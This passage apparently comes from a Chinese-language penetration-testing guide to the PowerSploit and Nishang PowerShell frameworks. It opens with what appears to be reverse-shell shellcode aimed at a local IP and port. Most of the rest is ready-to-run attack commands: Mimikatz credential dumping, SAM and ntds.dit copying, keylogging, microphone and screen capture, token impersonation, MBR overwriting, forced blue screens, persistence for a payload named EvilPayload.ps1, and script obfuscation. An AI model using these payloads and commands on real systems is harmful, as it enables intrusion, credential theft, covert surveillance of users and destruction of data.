class="hljs-number">0</span>xac,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>x38,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xf6,<span class="hljs-number">0</span>x3,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x3b,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xe4,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x66,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x4b,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x1c,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd0,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>x44,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x12,<span class="hljs-number">0</span>xeb,<span class="hljs-number">0</span>x8d,<span class="hljs-number">0</span>x5d,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x33,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x73,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x7,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>xb8,<span class="hljs-number">0</span>x90,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc4,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>x80,<span class="hljs-number">0</span>x6b,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x5,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>xa8,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x5c,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe6,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xea,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xdf,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x97,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x99,<span class="hljs-number">0</span>xa5,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x85,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>xa,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x4e,<span class="hljs-number">0</span>x8,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xec,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7e,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>xa4,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x93,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x22,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xb,<span class="hljs-number">0</span>x2f,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>x6e,<span class="hljs-number">0</span>x4d,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>xe9,<span class="hljs-number">0</span>x71,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc6,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>xbb,<span class="hljs-number">0</span>xf0,<span class="hljs-number">0</span>xb5,<span class="hljs-number">0</span>xa2,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5) -Force
</code></pre>
<h4 id="invoke-wmicommand">Invoke-WmiCommand</h4>
<p>&#x5728;&#x76EE;&#x6807;&#x4E3B;&#x673A;&#x4F7F;&#x7528;wmi&#x6267;&#x884C;&#x547D;&#x4EE4;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"><span class="hljs-variable">$username</span> = <span class="hljs-string">&quot;test\Administrator&quot;</span>
<span class="hljs-variable">$password</span> = echo <span class="hljs-string">&quot;123456&quot;</span> | <span class="hljs-built_in">ConvertTo-SecureString</span> -AsPlainText -Force
<span class="hljs-variable">$c</span> = <span class="hljs-built_in">New-Object</span> System.Management.Automation.PSCredential <span class="hljs-variable">$username</span>,<span class="hljs-variable">$password</span>

Invoke-Wmicommand -Payload { <span class="hljs-number">1</span> + <span class="hljs-number">1</span> } -ComputerName <span class="hljs-string">&apos;192.168.1.1&apos;</span> -Credential <span class="hljs-variable">$Credentials</span>
</code></pre>
<h3 id="exfiltration">Exfiltration</h3>
<h4 id="get-gppautologon">Get-GPPAutologon</h4>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-GPPAutologon
</code></pre>
<h4 id="get-gpppassword">Get-GPPPassword</h4>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-GPPPassword
</code></pre>
<h4 id="get-keystrokes">Get-Keystrokes</h4>
<p>&#x952E;&#x76D8;&#x8BB0;&#x5F55;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-Keystrokes -LogPath .\<span class="hljs-number">1</span>.txt
</code></pre>
<h4 id="get-microphoneaudio">Get-MicrophoneAudio</h4>
<p><strong>&#x901A;&#x8FC7;&#x9EA6;&#x514B;&#x98CE;&#x8BB0;&#x5F55;&#x58F0;&#x97F3;</strong></p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-MicrophoneAudio -Path .\<span class="hljs-number">1</span>.wav -Length <span class="hljs-number">10</span>
</code></pre>
<h4 id="get-timedscreenshot">Get-TimedScreenshot</h4>
<p><strong>&#x5C4F;&#x5E55;&#x8BB0;&#x5F55;</strong></p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-TimedScreenshot -Path .\screenshot\ -Interval <span class="hljs-number">10</span> -EndTime <span class="hljs-number">18</span>:<span class="hljs-number">00</span>
</code></pre>
<h4 id="get-vaultcredential">Get-VaultCredential</h4>
<p><strong>&#x4ECE;&#x51ED;&#x8BC1;&#x7BA1;&#x7406;&#x5668;&#x4E2D;&#x83B7;&#x53D6;&#x51ED;&#x8BC1;</strong></p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-VaultCredential
</code></pre>
<h4 id="invoke-credentialinjection">Invoke-CredentialInjection</h4>
<p><strong>&#x53C2;&#x8003;</strong>
&gt;
<a href="https://clymb3r.wordpress.com/2013/11/17/injecting-logon-credentials-with-powershell/" target="_blank">https://clymb3r.wordpress.com/2013/11/17/injecting-logon-credentials-with-powershell/</a></p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-CredentialInjection -UserName test -Password <span class="hljs-number">123456</span> -NewWinLogon
</code></pre>
<h4 id="invoke-mimikatz">Invoke-Mimikatz</h4>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-Mimikatz -DumpCreds
</code></pre>
<p>&#x6267;&#x884C;mimikaz&#x547D;&#x4EE4;</p>
<pre><code class="lang-powershell">invoke-mimikatz -Command <span class="hljs-string">&quot;Privilege::Debug Sekurlsa::logonpasswords&quot;</span>
</code></pre>
<h4 id="invoke-ninjacopy">Invoke-NinjaCopy</h4>
<p>&#x67D0;&#x4E9B;&#x6587;&#x4EF6;&#x88AB;&#x5176;&#x4ED6;&#x8FDB;&#x7A0B;&#x5360;&#x7528;&#x5BFC;&#x81F4;&#x4E0D;&#x80FD;&#x590D;&#x5236;&#x65F6;&#xFF0C;&#x53EF;&#x4EE5;&#x5C1D;&#x8BD5;&#x7528;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x6765;&#x590D;&#x5236;&#xFF08;&#x4F8B;&#x5982;&#x60F3;dump SAM&#x6587;&#x4EF6;&#xFF09;
&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\SAM.hive
</code></pre>
<h4 id="invoke-tokenmanipulation">Invoke-TokenManipulation</h4>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/" target="_blank">https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/</a></p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x679A;&#x4E3E;&#x552F;&#x4E00; &#x53EF;&#x7528;&#x7684;&#x4EE4;&#x724C;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -Enumerate
</code></pre>
<p><strong>&#x679A;&#x4E3E;&#x6240;&#x6709;&#x7684;&#x4EE4;&#x724C;&#xFF08;&#x5305;&#x62EC;&#x4E0D;&#x552F;&#x4E00;&#x7684;&#x4E0E;&#x901A;&#x8FC7;&#x7F51;&#x7EDC;&#x767B;&#x9646;&#x6240;&#x521B;&#x5EFA;&#x7684;&#x4EE4;&#x724C;&#xFF09;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -ShowAll
</code></pre>
<p><strong>&#x4F7F;&#x7528;SYSTEM&#x7528;&#x6237;&#x7684;&#x4EE4;&#x724C;&#x521B;&#x5EFA;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -CreateProcess <span class="hljs-string">&quot;calc.exe&quot;</span> -Username <span class="hljs-string">&quot;NT AUTHORITY\SYSTEM&quot;</span>
</code></pre>
<p>&#x8FD9;&#x91CC;&#x4E5F;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;ID&#x6765;&#x6307;&#x5B9A;&#x4E00;&#x4E2A;Token</p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -CreateProcess <span class="hljs-string">&quot;calc.exe&quot;</span> -ProcessId <span class="hljs-string">&quot;1234&quot;</span>
</code></pre>
<p>&#x90A3;&#x4E48;&#x8FD9;&#x91CC;&#x4F1A;&#x4F7F;&#x7528;&#x8FDB;&#x7A0B;ID1234&#x7684;&#x4F1A;&#x8BDD;&#x6765;&#x542F;&#x52A8;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;</p>
<p><strong>&#x4F7F;&#x5F53;&#x524D;&#x7684;&#x7EBF;&#x7A0B;&#x4EE4;&#x724C;&#x6A21;&#x4EFF;SYSTEM&#x7528;&#x6237;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -ImpersonateUser -Username <span class="hljs-string">&quot;nt authority\system&quot;</span>
</code></pre>
<h4 id="out-minidump">Out-Minidump</h4>
<p>dump&#x6307;&#x5B9A;&#x8FDB;&#x7A0B;&#x5B8C;&#x6574;&#x7684;&#x5185;&#x5B58;&#x955C;&#x50CF;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Out-Minidump -Process (<span class="hljs-built_in">Get-Process</span> -Id <span class="hljs-number">2612</span>) -DumpFilePath .\
</code></pre>
<h4 id="volumeshadowcopytools">VolumeShadowCopyTools</h4>
<p>&#x5377;&#x5F71;&#x62F7;&#x8D1D;&#x5DE5;&#x5177;</p>
<h5 id="get-volumeshadowcopy">Get-VolumeShadowCopy</h5>
<p>&#x5217;&#x51FA;&#x6240;&#x6709;&#x5377;&#x5F71;&#x62F7;&#x8D1D;&#x7684;&#x8DEF;&#x5F84;
&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;
<strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-VolumeShadowCopy
</code></pre>
<h5 id="new-volumeshadowcopy">New-VolumeShadowCopy</h5>
<p>&#x65B0;&#x5EFA;&#x5377;&#x5F71;&#x62F7;&#x8D1D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">New-VolumeShadowCopy -Volume C:\
</code></pre>
<h5 id="mount-volumeshadowcopy">Mount-VolumeShadowCopy</h5>
<p>&#x6302;&#x8F7D;&#x5377;&#x5F71;&#x62F7;&#x8D1D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Mount-VolumeShadowCopy -Path C:\Users\haha -DevicePath \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
</code></pre>
<h5 id="remove-volumeshadowcopy">Remove-VolumeShadowCopy</h5>
<p>&#x5220;&#x9664;&#x5377;&#x5F71;&#x62F7;&#x8D1D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Remove-VolumeShadowCopy -DevicePath \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
</code></pre>
<h3 id="mayhem">Mayhem</h3>
<p>&#x5C06;&#x6B64;&#x6A21;&#x5757;&#x653E;&#x5728;<code>%Systemroot%/System32\WindowsPowerShell\v1.0\Modules</code>
&#x6216;
<code>$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules</code></p>
<h4 id="set-criticalprocess">Set-CriticalProcess</h4>
<p>&#x9000;&#x51FA;powershell&#x65F6;&#x4F7F;&#x7CFB;&#x7EDF;&#x84DD;&#x5C4F;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Set-CriticalProcess
</code></pre>
<p>&#x7ACB;&#x523B;&#x9000;&#x51FA;</p>
<pre><code class="lang-powershell">Set-CriticalProcess -ExitImmediately
</code></pre>
<h4 id="set-masterbootrecord">Set-MasterBootRecord</h4>
<p>&#x8986;&#x5199;&#x4E3B;&#x5F15;&#x5BFC;&#x8BB0;&#x5F55;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Set-MasterBootRecord -BootMessage <span class="hljs-string">&quot;test&quot;</span>
</code></pre>
<h3 id="persistence">Persistence</h3>
<p>&#x540C;mayhem&#x653E;&#x7F6E;&#x4F4D;&#x7F6E;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"><span class="hljs-variable">$ElevatedOptions</span> = New-ElevatedPersistenceOption  -PermanentWMI -Daily -At <span class="hljs-string">&apos;3 PM&apos;</span>
<span class="hljs-variable">$UserOptions</span> = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption <span class="hljs-variable">$ElevatedOptions</span> -UserPersistenceOption <span class="hljs-variable">$UserOptions</span>
</code></pre>
<h3 id="privesc">Privesc</h3>
<h4 id="get-system">Get-System</h4>
<p>&#x9700;&#x8981;&#x8FD0;&#x884C;&#x5728;STA&#x6A21;&#x5F0F;&#x4E0B;&#xFF0C;&#x542F;&#x52A8;&#x53C2;&#x6570;-STA</p>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/" target="_blank">http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/</a></p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">get-system
</code></pre>
<p><strong>&#x9009;&#x62E9;&#x65B9;&#x5F0F;</strong></p>
<pre><code class="lang-powershell">get-system -Technique namedpipe/token
</code></pre>
<p><strong>&#x6062;&#x590D;&#x4EE4;&#x724C;</strong></p>
<pre><code class="lang-powershell">Get-System -RevToSelf
</code></pre>
<h4 id="powerup">PowerUp</h4>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/" target="_blank">http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/</a>
<a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc" target="_blank">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc</a></p>
<h3 id="recon">Recon</h3>
<h4 id="get-computerdetails">Get-ComputerDetails</h4>
<p>&#x83B7;&#x53D6;&#x8BA1;&#x7B97;&#x673A;&#x4FE1;&#x606F;</p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-ComputerDetails
</code></pre>
<h4 id="get-httpstatus">Get-HttpStatus</h4>
<p>&#x626B;&#x76EE;&#x5F55;&#x811A;&#x672C;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-HttpStatus -Target www.example.com -Path C:\dic.txt -UseSSL
</code></pre>
<h4 id="invoke-portscan">Invoke-Portscan</h4>
<p>&#x626B;&#x7AEF;&#x53E3;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<p><strong>&#x626B;&#x63CF;192.168.1.1/24&#x7684;135,139,445&#x7AEF;&#x53E3;</strong></p>
<pre><code class="lang-powershell">Invoke-Portscan -Hosts <span class="hljs-number">192.168</span>.<span class="hljs-number">1</span>,<span class="hljs-number">1</span> -Ports <span class="hljs-string">&quot;135,139,445,1&quot;</span> -Threads <span class="hljs-number">50</span>
</code></pre>
<p><strong>&#x626B;&#x63CF;Top50&#x7684;&#x7AEF;&#x53E3;</strong></p>
<pre><code class="lang-powershell">Invoke-Portscan -Hosts <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span> -TopPorts <span class="hljs-number">50</span> -Threads <span class="hljs-number">50</span>
</code></pre>
<p><strong>&#x626B;&#x63CF;&#x524D;&#x4E0D;ping&#x76EE;&#x6807;&#x4E3B;&#x673A;</strong></p>
<pre><code class="lang-powershell">Invoke-Portscan -Hosts <span class="hljs-number">192.168</span>.<span class="hljs-number">169.168</span> -Ports <span class="hljs-number">445</span> -SkipDiscovery
</code></pre>
<h4 id="invoke-reversednslookup">Invoke-ReverseDnsLookup</h4>
<p>ip&#x53CD;&#x67E5;&#x4E3B;&#x673A;&#x540D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"> Invoke-ReverseDnsLookup -IpRange <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span>-<span class="hljs-number">192.168</span>.<span class="hljs-number">1.254</span>
</code></pre>
<h4 id="powerview">PowerView</h4>
<p>&#x540C;mayhem&#x653E;&#x7F6E;&#x4F4D;&#x7F6E;</p>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/README.md" target="_blank">https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/README.md</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-1/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-1/</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-2/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-2/</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-3/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-3/</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-4/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-4/</a></p>
</blockquote>
<h3 id="scriptmodification">ScriptModification</h3>
<h4 id="out-compresseddll">Out-CompressedDll</h4>
<p>&#x5C06;dll&#x538B;&#x7F29;&#x5E76;base64&#x7F16;&#x7801;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Out-CompressedDll -FilePath test.dll
</code></pre>
<h4 id="out-encodedcommand">Out-EncodedCommand</h4>
<p>&#x5C06;&#x811A;&#x672C;&#x6216;&#x4EE3;&#x7801;&#x5757;&#x7F16;&#x7801;</p>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x811A;&#x672C;&#x5757;&#x7F16;&#x7801;</strong></p>
<pre><code class="lang-powershell"> Out-EncodedCommand -ScriptBlock {<span class="hljs-built_in">write-host</span> <span class="hljs-string">&apos;whoami&apos;</span>}
</code></pre>
<p><strong>&#x811A;&#x672C;&#x7F16;&#x7801;</strong></p>
<pre><code class="lang-powershell">Out-EncodedCommand -Path .\<span class="hljs-number">1</span>.ps1 -WindowStyle Hidden
</code></pre>
<h4 id="out-encryptedscript">Out-EncryptedScript</h4>
<p>&#x811A;&#x672C;&#x52A0;&#x5BC6;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"> Out-EncryptedScript -ScriptPath .\<span class="hljs-number">1</span>.ps1 -Password fuck -Salt <span class="hljs-number">123</span> -FilePath .\encrypt.ps1
</code></pre>
<h4 id="remove-comments">Remove-Comments</h4>
<p>&#x5220;&#x9664;&#x6CE8;&#x91CA;&#x548C;&#x4E0D;&#x5FC5;&#x8981;&#x7684;&#x7A7A;&#x767D;&#x7B26;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Remove-Comments -Path .\<span class="hljs-number">1</span>.ps1
</code></pre>
<pre><code class="lang-powershell">Remove-Comments -ScriptBlock { whoami }
</code></pre>
<h2 id="nishang">Nishang</h2>
<p>&#x4E0B;&#x9762;Nishang&#x7684;&#x4ECB;&#x7ECD;&#xFF0C;&#x670B;&#x53CB;<a href="https://github.com/lwhv1ct0r/" target="_blank">V1ct0r</a>&#x5BF9;&#x4E8E;Nishang&#x7684;&#x603B;&#x7ED3;&#x4E0D;&#x9519;&#xFF0C;&#x8FD9;&#x91CC;&#x4E89;&#x53D6;&#x540C;&#x610F;&#x4E4B;&#x540E;&#x4E00;&#x8D77;&#x53D1;&#x7ED9;&#x5927;&#x5BB6;&#x67E5;&#x770B;&#x3002;</p>
<h3 id="0&#x4FE1;&#x606F;&#x641C;&#x96C6;">0.&#x4FE1;&#x606F;&#x641C;&#x96C6;</h3>
<h4 id="check-vm">Check-VM</h4>
<p>&#x4ECE;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x7684;&#x540D;&#x5B57;&#x5C31;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x6765;&#xFF0C;&#x5B83;&#x662F;&#x7528;&#x4E8E;&#x68C0;&#x6D4B;&#x5F53;&#x524D;&#x7684;&#x673A;&#x5668;&#x662F;&#x5426;&#x662F;&#x4E00;&#x53F0;&#x5DF2;&#x77E5;&#x7684;&#x865A;&#x62DF;&#x673A;&#x7684;&#x3002;&#x5B83;&#x901A;&#x8FC7;&#x68C0;&#x6D4B;&#x5DF2;&#x77E5;&#x7684;&#x4E00;&#x4E9B;&#x865A;&#x62DF;&#x673A;&#x7684;&#x6307;&#x7EB9;&#x4FE1;&#x606F;&#xFF08;&#x5982;&#xFF1A;Hyper-V, VMWare, Virtual PC, Virtual Box,Xen,QEMU&#xFF09;&#x6765;&#x8BC6;&#x522B;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Check-VM
</code></pre>
<p>&#x6D4B;&#x8BD5;</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/check-vm.jpg" alt="Check-VM"></p>
<h4 id="copy-vss">Copy-VSS</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x5229;&#x7528;Volume Shadow Copy &#x670D;&#x52A1;&#x6765;&#x590D;&#x5236;&#x51FA;SAM&#x6587;&#x4EF6;&#x3002;&#x5982;&#x679C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x8FD0;&#x884C;&#x5728;&#x4E86;DC&#x673A;&#x4E0A;ntds.dit&#x548C;SYSTEM hive&#x4E5F;&#x80FD;&#x88AB;&#x62F7;&#x8D1D;&#x51FA;&#x6765;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Copy-VSS //&#x5C06;&#x4F1A;&#x76F4;&#x63A5;&#x628A;&#x6587;&#x4EF6;&#x4FDD;&#x5B58;&#x5728;&#x5F53;&#x524D;&#x8DEF;&#x5F84;&#x4E0B;
PS &gt; Copy-VSS -DestinationDir C:\temp  //&#x6307;&#x5B9A;&#x4FDD;&#x5B58;&#x6587;&#x4EF6;&#x7684;&#x8DEF;&#x5F84;&#xFF08;&#x5FC5;&#x987B;&#x662F;&#x5DF2;&#x7ECF;&#x5B58;&#x5728;&#x7684;&#x8DEF;&#x5F84;&#xFF09;
</code></pre>
<p>&#x6D4B;&#x8BD5;
